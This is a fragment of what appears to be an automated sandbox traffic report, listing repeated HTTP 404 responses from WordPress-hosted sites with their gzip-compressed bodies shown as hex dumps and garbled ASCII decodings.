f3 fa a4 3c a1 74 07 16 d0 68 75 ab 31 59 a4 91 0a fb f3 96 8f f8 a0 f3 21 85 1c ea 8f e8 a7 ad d1 16 78 69 70 9e bb 23 4d 92 f7 08 c9 e5 95 3b 9c 05 fb 49 c0 ab e5 cc 47 6a 3d c9 9a 3f 3a 57 8e 47 74 89 df 79 c2 49 ba ef e9 98 ef 4e e1 4f 29 38 c4 15 54 e8 e5 a8 ca 87 13 23 76 55 c3 65 35 c6 5b 69 b5 eb cc 50 35 e5 bd b4 b3 96 d2 18 b6 cc 57 81 81 0c 53 7b 17 c0 f3 00 06 aa 78 3e 75 0f 3e ea 4a 9a 19 4c ab 95 32 53 6e 60 93 07 27 ab 41 9e de 4b 37 aa 1b a2 8c 5d e0 2d 84 40 d2 4d 42 9f b8 1d 87 bf 2f 44 88 47 03 db c5 45 7a 0a 22 ed 86 79 30 9b 6c 08 87 06 20 66 ac f1 b0 db 64 4d 8c 6e 2d 04 84 48 05 92 97 39 0e f2 88 de f1 8a 14 20 7e 84 33 1d b1 1b 52 68 fc e4 0d 86 58 cb 88 5e c8 10 20 86 71 5d 10 15 b6 44 38 0f 88 36 af 42 78 bc df ac f2 cb 55 be ca 98 18 b0 14 a2 01 a9 e8 b3 28 51 1d 53 a8 50 7a cf b4 da 64 e9 c2 6c 2c 6a a5 b6 ac 32 34 7a 93 4d 18 b2 e9 94 8b a9 63 ca 86 ae 0c 95 d7 2e 31 ff a6 d7 aa 86 53 65 d1 5c 6e 9f b0 5f a1 67 af c9 d2 2f 3d f1 c5 5e 11 a7 04 e1 f2 54 b2 da 3e 1d 10 b3 57 84 f8 01 a5 56 53 8a 4d eb Data Ascii: R]o6}a}F=8V=x-x9$uB
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:29:02 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1167Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 f1 d2 3d 38 b2 8b ae 1b da 01 eb 56 ac 03 8a 3d 15 94 78 2d b1 a1 78 39 92 b2 ec 0e fd ef bb d4 87 eb 24 ed d0 75 42 02 c9 f7 f3 dc 73 4e f1 e0 c7 df 9e fe f1 e7 cb 9f 58 13 5b b3 5d 14 e9 c5 8c b4 f5 26 73 91 ff f0 7b b6 5d 5c 14 0d 48 45 ef 8b a2 85 28 99 95 2d 6c b2 bd 86 de a1 8f 19 ab d0 46 b0 71 93 f5 5a c5 66 a3 60 af 2b e0 c3 8f ec 6e 97 c7 12 63 38 eb b1 a8 ad 82 c3 b7 cc e2 0e 8d c1 3e 63 62 68 8a 3a 1a d8 be 80 8e 05 1d 81 3d 6c 95 0c cd 35 7b 8a ad b6 35 7b 85 68 0b 31 d6 a4 ea 50 79 ed 22 0b be da 64 4d 8c 6e 2d 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 38 bd f2 b7 21 db 16 62 1c 33 4e 8c 47 03 2c 1e 1d a1 8e 70 88 a2 0a 54 f2 0d fb 7b c1 e8 29 f1 c0 83 7e 47 50 d6 f4 ed 15 78 4e a1 eb 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 4f d6 bc 5f 2c 4a 54 c7 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e cd fa 86 18 19 47 4d 91 d2 50 d1 18 c1 3d f8 1d f1 c8 0f 6b d6 68 a5 c0 8e f1 56 fa 5a db 35 5b 0e f3 bf ea bd 74 d3 02 69 74 6d 39 8d 6c c3 9a 55 a4 0a f8 b1 45 e9 e0 8c 3c ae d9 ce c0 04 fd 6d 17 a2 de 1d f9 a4 df ed 7a 52 86 37 a0 eb 86 e2 97 cb e5 be 19 56 e5 53 ed b4 2d cd a2 f4 6d 50 b2 8b c8 1e 7d 3d 06 9d 54 6a e0 64 39 fe 4e ec f3 01 e4 9d 75 f2 30 ba 6c cd ae 56 4b 37 12 b7 43 a4 82 69 d7 94 25 2c f3 68 24 33 69 a4 41 3b 7d 00 75 3d 69 19 23 b6 a7 75 06 76 71 a6 69 9a 36 33 f5 31 24 e9 c2 32 da 7b 62 dd 12 e5 4c 43 dd ca 1a d6 64 77 0b f3 fa a4 3c a1 74 07 16 d0 68 75 ab 31 59 a4 91 0a fb f3 96 8f f8 a0 f3 21 85 1c ea 8f e8 a7 ad d1 16 78 69 70 9e bb 23 4d 92 f7 08 c9 e5 95 3b 9c 05 fb 49 c0 ab e5 cc 47 6a 3d c9 9a 3f 3a 57 8e 47 74 89 df 79 c2 49 ba ef e9 98 ef 4e e1 4f 29 38 c4 15 54 e8 e5 a8 ca 87 13 23 76 55 c3 65 35 c6 5b 69 b5 eb cc 50 35 e5 bd b4 b3 96 d2 18 b6 cc 57 81 81 0c 53 7b 17 c0 f3 00 06 aa 78 3e 75 0f 3e ea 4a 9a 19 4c ab 95 32 53 6e 60 93 07 27 ab 41 9e de 4b 37 aa 1b a2 8c 5d e0 2d 84 40 d2 4d 42 9f b8 1d 87 bf 2f 44 88 47 03 db c5 45 7a 0a 22 ed 86 79 30 9b 6c 08 87 06 20 66 ac f1 b0 db 64 4d 8c 6e 2d 04 84 48 05 92 97 39 0e f2 88 de f1 8a 14 20 7e 84 33 1d b1 1b 52 68 fc e4 0d 86 58 cb 88 5e c8 10 20 86 71 5d 10 15 b6 44 38 0f 88 36 af 42 78 bc df ac f2 cb 55 be ca 98 18 b0 14 a2 01 a9 e8 b3 28 51 1d 53 a8 50 7a cf b4 da 64 e9 c2 6c 2c 6a a5 b6 ac 32 34 7a 93 4d 18 b2 e9 94 8b a9 63 ca 86 ae 0c 95 d7 2e 31 ff a6 d7 aa 86 53 65 d1 5c 6e 9f b0 5f a1 67 af c9 d2 2f 3d f1 c5 5e 11 a7 04 e1 f2 54 b2 da 3e 1d 10 b3 57 84 f8 01 a5 56 53 8a 4d eb Data Ascii: R]o6}a}F=8V=x-x9$uB
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:29:02 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1167Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 f1 d2 3d 38 b2 8b ae 1b da 01 eb 56 ac 03 8a 3d 15 94 78 2d b1 a1 78 39 92 b2 ec 0e fd ef bb d4 87 eb 24 ed d0 75 42 02 c9 f7 f3 dc 73 4e f1 e0 c7 df 9e fe f1 e7 cb 9f 58 13 5b b3 5d 14 e9 c5 8c b4 f5 26 73 91 ff f0 7b b6 5d 5c 14 0d 48 45 ef 8b a2 85 28 99 95 2d 6c b2 bd 86 de a1 8f 19 ab d0 46 b0 71 93 f5 5a c5 66 a3 60 af 2b e0 c3 8f ec 6e 97 c7 12 63 38 eb b1 a8 ad 82 c3 b7 cc e2 0e 8d c1 3e 63 62 68 8a 3a 1a d8 be 80 8e 05 1d 81 3d 6c 95 0c cd 35 7b 8a ad b6 35 7b 85 68 0b 31 d6 a4 ea 50 79 ed 22 0b be da 64 4d 8c 6e 2d 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 38 bd f2 b7 21 db 16 62 1c 33 4e 8c 47 03 2c 1e 1d a1 8e 70 88 a2 0a 54 f2 0d fb 7b c1 e8 29 f1 c0 83 7e 47 50 d6 f4 ed 15 78 4e a1 eb 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 4f d6 bc 5f 2c 4a 54 c7 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e cd fa 86 18 19 47 4d 91 d2 50 d1 18 c1 3d f8 1d f1 c8 0f 6b d6 68 a5 c0 8e f1 56 fa 5a db 35 5b 0e f3 bf ea bd 74 d3 02 69 74 6d 39 8d 6c c3 9a 55 a4 0a f8 b1 45 e9 e0 8c 3c ae d9 ce c0 04 fd 6d 17 a2 de 1d f9 a4 df ed 7a 52 86 37 a0 eb 86 e2 97 cb e5 be 19 56 e5 53 ed b4 2d cd a2 f4 6d 50 b2 8b c8 1e 7d 3d 06 9d 54 6a e0 64 39 fe 4e ec f3 01 e4 9d 75 f2 30 ba 6c cd ae 56 4b 37 12 b7 43 a4 82 69 d7 94 25 2c f3 68 24 33 69 a4 41 3b 7d 00 75 3d 69 19 23 b6 a7 75 06 76 71 a6 69 9a 36 33 f5 31 24 e9 c2 32 da 7b 62 dd 12 e5 4c 43 dd ca 1a d6 64 77 0b f3 fa a4 3c a1 74 07 16 d0 68 75 ab 31 59 a4 91 0a fb f3 96 8f f8 a0 f3 21 85 1c ea 8f e8 a7 ad d1 16 78 69 70 9e bb 23 4d 92 f7 08 c9 e5 95 3b 9c 05 fb 49 c0 ab e5 cc 47 6a 3d c9 9a 3f 3a 57 8e 47 74 89 df 79 c2 49 ba ef e9 98 ef 4e e1 4f 29 38 c4 15 54 e8 e5 a8 ca 87 13 23 76 55 c3 65 35 c6 5b 69 b5 eb cc 50 35 e5 bd b4 b3 96 d2 18 b6 cc 57 81 81 0c 53 7b 17 c0 f3 00 06 aa 78 3e 75 0f 3e ea 4a 9a 19 4c ab 95 32 53 6e 60 93 07 27 ab 41 9e de 4b 37 aa 1b a2 8c 5d e0 2d 84 40 d2 4d 42 9f b8 1d 87 bf 2f 44 88 47 03 db c5 45 7a 0a 22 ed 86 79 30 9b 6c 08 87 06 20 66 ac f1 b0 db 64 4d 8c 6e 2d 04 84 48 05 92 97 39 0e f2 88 de f1 8a 14 20 7e 84 33 1d b1 1b 52 68 fc e4 0d 86 58 cb 88 5e c8 10 20 86 71 5d 10 15 b6 44 38 0f 88 36 af 42 78 bc df ac f2 cb 55 be ca 98 18 b0 14 a2 01 a9 e8 b3 28 51 1d 53 a8 50 7a cf b4 da 64 e9 c2 6c 2c 6a a5 b6 ac 32 34 7a 93 4d 18 b2 e9 94 8b a9 63 ca 86 ae 0c 95 d7 2e 31 ff a6 d7 aa 86 53 65 d1 5c 6e 9f b0 5f a1 67 af c9 d2 2f 3d f1 c5 5e 11 a7 04 e1 f2 54 b2 da 3e 1d 10 b3 57 84 f8 01 a5 56 53 8a 4d eb Data Ascii: R]o6}a}F=8V=x-x9$uB
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:29:05 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1167Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 f1 d2 3d 38 b2 8b ae 1b da 01 eb 56 ac 03 8a 3d 15 94 78 2d b1 a1 78 39 92 b2 ec 0e fd ef bb d4 87 eb 24 ed d0 75 42 02 c9 f7 f3 dc 73 4e f1 e0 c7 df 9e fe f1 e7 cb 9f 58 13 5b b3 5d 14 e9 c5 8c b4 f5 26 73 91 ff f0 7b b6 5d 5c 14 0d 48 45 ef 8b a2 85 28 99 95 2d 6c b2 bd 86 de a1 8f 19 ab d0 46 b0 71 93 f5 5a c5 66 a3 60 af 2b e0 c3 8f ec 6e 97 c7 12 63 38 eb b1 a8 ad 82 c3 b7 cc e2 0e 8d c1 3e 63 62 68 8a 3a 1a d8 be 80 8e 05 1d 81 3d 6c 95 0c cd 35 7b 8a ad b6 35 7b 85 68 0b 31 d6 a4 ea 50 79 ed 22 0b be da 64 4d 8c 6e 2d 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 38 bd f2 b7 21 db 16 62 1c 33 4e 8c 47 03 2c 1e 1d a1 8e 70 88 a2 0a 54 f2 0d fb 7b c1 e8 29 f1 c0 83 7e 47 50 d6 f4 ed 15 78 4e a1 eb 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 4f d6 bc 5f 2c 4a 54 c7 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e cd fa 86 18 19 47 4d 91 d2 50 d1 18 c1 3d f8 1d f1 c8 0f 6b d6 68 a5 c0 8e f1 56 fa 5a db 35 5b 0e f3 bf ea bd 74 d3 02 69 74 6d 39 8d 6c c3 9a 55 a4 0a f8 b1 45 e9 e0 8c 3c ae d9 ce c0 04 fd 6d 17 a2 de 1d f9 a4 df ed 7a 52 86 37 a0 eb 86 e2 97 cb e5 be 19 56 e5 53 ed b4 2d cd a2 f4 6d 50 b2 8b c8 1e 7d 3d 06 9d 54 6a e0 64 39 fe 4e ec f3 01 e4 9d 75 f2 30 ba 6c cd ae 56 4b 37 12 b7 43 a4 82 69 d7 94 25 2c f3 68 24 33 69 a4 41 3b 7d 00 75 3d 69 19 23 b6 a7 75 06 76 71 a6 69 9a 36 33 f5 31 24 e9 c2 32 da 7b 62 dd 12 e5 4c 43 dd ca 1a d6 64 77 0b f3 fa a4 3c a1 74 07 16 d0 68 75 ab 31 59 a4 91 0a fb f3 96 8f f8 a0 f3 21 85 1c ea 8f e8 a7 ad d1 16 78 69 70 9e bb 23 4d 92 f7 08 c9 e5 95 3b 9c 05 fb 49 c0 ab e5 cc 47 6a 3d c9 9a 3f 3a 57 8e 47 74 89 df 79 c2 49 ba ef e9 98 ef 4e e1 4f 29 38 c4 15 54 e8 e5 a8 ca 87 13 23 76 55 c3 65 35 c6 5b 69 b5 eb cc 50 35 e5 bd b4 b3 96 d2 18 b6 cc 57 81 81 0c 53 7b 17 c0 f3 00 06 aa 78 3e 75 0f 3e ea 4a 9a 19 4c ab 95 32 53 6e 60 93 07 27 ab 41 9e de 4b 37 aa 1b a2 8c 5d e0 2d 84 40 d2 4d 42 9f b8 1d 87 bf 2f 44 88 47 03 db c5 45 7a 0a 22 ed 86 79 30 9b 6c 08 87 06 20 66 ac f1 b0 db 64 4d 8c 6e 2d 04 84 48 05 92 97 39 0e f2 88 de f1 8a 14 20 7e 84 33 1d b1 1b 52 68 fc e4 0d 86 58 cb 88 5e c8 10 20 86 71 5d 10 15 b6 44 38 0f 88 36 af 42 78 bc df ac f2 cb 55 be ca 98 18 b0 14 a2 01 a9 e8 b3 28 51 1d 53 a8 50 7a cf b4 da 64 e9 c2 6c 2c 6a a5 b6 ac 32 34 7a 93 4d 18 b2 e9 94 8b a9 63 ca 86 ae 0c 95 d7 2e 31 ff a6 d7 aa 86 53 65 d1 5c 6e 9f b0 5f a1 67 af c9 d2 2f 3d f1 c5 5e 11 a7 04 e1 f2 54 b2 da 3e 1d 10 b3 57 84 f8 01 a5 56 53 8a 4d eb Data Ascii: R]o6}a}F=8V=x-x9$uB
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:29:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8e28094c38734779-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 36 65 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 7d 33 78 11 51 ca df b6 a2 f8 dd 72 f8 9d 7b bf f3 a2 72 28 8a 35 72 64 38 a7 43 22 e4 8b 30 13 54 12 67 42 06 4b a2 9b bc c4 6d 39 f8 2f c1 0c 0f 31 a7 76 41 f3 9c c4 b6 c4 03 47 dc 25 10 1d 29 e3 a1 f1 aa 3d 18 e0 b8 bd 19 45 99 00 1f a1 11 96 94 e5 f6 25 4d c9 3b 80 af 04 d5 ab e1 30 6a 79 f1 26 a2 12 c2 8e 1e 02 c3 3f e5 ec 07 fd 23 db 46 7f 63 2c 49 09 ba c4 09 fa 88 73 9c 10 8e 6c fb e2 10 21 84 fa 22 e2 b4 90 17 8d e1 38 8f 80 7f 63 62 c5 96 b0 52 8b 9a b3 c9 d7 f4 5b 08 3f fe fc f3 eb b7 1e fc e1 14 63 31 6a cc 4e 12 99 39 42 62 2e 4f ba 8a 4c 4e 26 e8 27 2c 49 c3 74 12 22 2f 69 46 1a a6 45 ee 48 2e bb 0a f6 46 9c cc cd de 1d e6 68 18 c6 00 f2 3e 25 19 c9 a5 78 3b bd c4 c9 af 38 23 0d 61 7e f5 be 59 8a da 4d 18 3b 11 27 58 92 12 ac 21 4c 2b 4e c3 f4 28 3c 89 b1 c4 bf e0 29 e1 27 6f 4e 8e d3 f0 e4 75 da 3d 39 e9 dd 38 58 4c f3 28 94 7c 4c 7a 37 8e e0 51 a8 28 9d 2c b2 c2 64 32 71 12 65 06 89 93 4c 1b c1 89 58 e6 6a e9 de d0 38 3c 79 4d 5f c7 69 6f e8 14 98 93 5c fe ca 62 e2 d0 5c 10 2e df 92 21 e3 a4 71 63 0d cd 9e 22 3b 37 1b 13 9a c7 6c 62 c5 2c 1a 83 84 d6 89 36 e4 89 55 91 d0 3a f9 db e5 47 fb e3 bf fe db e9 d9 df 4f Data Ascii: 16eb<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:29:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8e28095c3a2ce817-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 36 65 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 7d 33 78 11 51 ca df b6 a2 f8 dd 72 f8 9d 7b bf f3 a2 72 28 8a 35 72 64 38 a7 43 22 e4 8b 30 13 54 12 67 42 06 4b a2 9b bc c4 6d 39 f8 2f c1 0c 0f 31 a7 76 41 f3 9c c4 b6 c4 03 47 dc 25 10 1d 29 e3 a1 f1 aa 3d 18 e0 b8 bd 19 45 99 00 1f a1 11 96 94 e5 f6 25 4d c9 3b 80 af 04 d5 ab e1 30 6a 79 f1 26 a2 12 c2 8e 1e 02 c3 3f e5 ec 07 fd 23 db 46 7f 63 2c 49 09 ba c4 09 fa 88 73 9c 10 8e 6c fb e2 10 21 84 fa 22 e2 b4 90 17 8d e1 38 8f 80 7f 63 62 c5 96 b0 52 8b 9a b3 c9 d7 f4 5b 08 3f fe fc f3 eb b7 1e fc e1 14 63 31 6a cc 4e 12 99 39 42 62 2e 4f ba 8a 4c 4e 26 e8 27 2c 49 c3 74 12 22 2f 69 46 1a a6 45 ee 48 2e bb 0a f6 46 9c cc cd de 1d e6 68 18 c6 00 f2 3e 25 19 c9 a5 78 3b bd c4 c9 af 38 23 0d 61 7e f5 be 59 8a da 4d 18 3b 11 27 58 92 12 ac 21 4c 2b 4e c3 f4 28 3c 89 b1 c4 bf e0 29 e1 27 6f 4e 8e d3 f0 e4 75 da 3d 39 e9 dd 38 58 4c f3 28 94 7c 4c 7a 37 8e e0 51 a8 28 9d 2c b2 c2 64 32 71 12 65 06 89 93 4c 1b c1 89 58 e6 6a e9 de d0 38 3c 79 4d 5f c7 69 6f e8 14 98 93 5c fe ca 62 e2 d0 5c 10 2e df 92 21 e3 a4 71 63 0d cd 9e 22 3b 37 1b 13 9a c7 6c 62 c5 2c 1a 83 84 d6 89 36 e4 89 55 91 d0 3a f9 db e5 47 fb e3 bf fe db e9 d9 df 4f Data Ascii: 16eb<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:29:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EngineExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8e28096c09a63ab4-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 36 65 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 7d 33 78 11 51 ca df b6 a2 f8 dd 72 f8 9d 7b bf f3 a2 72 28 8a 35 72 64 38 a7 43 22 e4 8b 30 13 54 12 67 42 06 4b a2 9b bc c4 6d 39 f8 2f c1 0c 0f 31 a7 76 41 f3 9c c4 b6 c4 03 47 dc 25 10 1d 29 e3 a1 f1 aa 3d 18 e0 b8 bd 19 45 99 00 1f a1 11 96 94 e5 f6 25 4d c9 3b 80 af 04 d5 ab e1 30 6a 79 f1 26 a2 12 c2 8e 1e 02 c3 3f e5 ec 07 fd 23 db 46 7f 63 2c 49 09 ba c4 09 fa 88 73 9c 10 8e 6c fb e2 10 21 84 fa 22 e2 b4 90 17 8d e1 38 8f 80 7f 63 62 c5 96 b0 52 8b 9a b3 c9 d7 f4 5b 08 3f fe fc f3 eb b7 1e fc e1 14 63 31 6a cc 4e 12 99 39 42 62 2e 4f ba 8a 4c 4e 26 e8 27 2c 49 c3 74 12 22 2f 69 46 1a a6 45 ee 48 2e bb 0a f6 46 9c cc cd de 1d e6 68 18 c6 00 f2 3e 25 19 c9 a5 78 3b bd c4 c9 af 38 23 0d 61 7e f5 be 59 8a da 4d 18 3b 11 27 58 92 12 ac 21 4c 2b 4e c3 f4 28 3c 89 b1 c4 bf e0 29 e1 27 6f 4e 8e d3 f0 e4 75 da 3d 39 e9 dd 38 58 4c f3 28 94 7c 4c 7a 37 8e e0 51 a8 28 9d 2c b2 c2 64 32 71 12 65 06 89 93 4c 1b c1 89 58 e6 6a e9 de d0 38 3c 79 4d 5f c7 69 6f e8 14 98 93 5c fe ca 62 e2 d0 5c 10 2e df 92 21 e3 a4 71 63 0d cd 9e 22 3b 37 1b 13 9a c7 6c 62 c5 2c 1a 83 84 d6 89 36 e4 89 55 91 d0 3a f9 db e5 47 fb e3 bf fe db e9 d9 df 4f Data Ascii: 16e1<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 15:29:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2FwE%2BoCxkUEXKUJPlZjKxD6pqjoPZcpcYh4qLd4paxFhg7YzrOrlm%2F9hWLguqVjp3tVImWGPEidXYnB4EnluE0Mz1MY%2Fli2V7Ere1ZWDXCDnwTN89pCRohl8ZWsjyVQOtrkQ4UhvvJM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e280a4c9d7ae779-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1348&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=685&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
